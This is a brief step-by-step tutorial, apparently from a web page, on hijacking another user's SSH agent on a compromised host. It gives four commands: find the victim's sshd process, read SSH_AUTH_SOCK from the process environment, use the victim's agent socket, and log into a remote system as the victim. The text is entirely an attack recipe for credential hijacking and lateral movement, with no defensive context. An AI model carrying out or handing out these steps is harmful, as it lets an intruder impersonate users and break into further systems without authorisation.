Step 1: We first determine the SSH process ID of the user on the compromised host:
1
ps aux |grep sshd
Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID:
1
grep SSH_AUTH_SOCK /proc/<PID>/environ
Step 3: We then hijack the targets ssh-agent socket:
1
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add –l
Step 4: Finally, we log into the remote system our victim is logged into as the target:
1
ssh remotesystem -l victim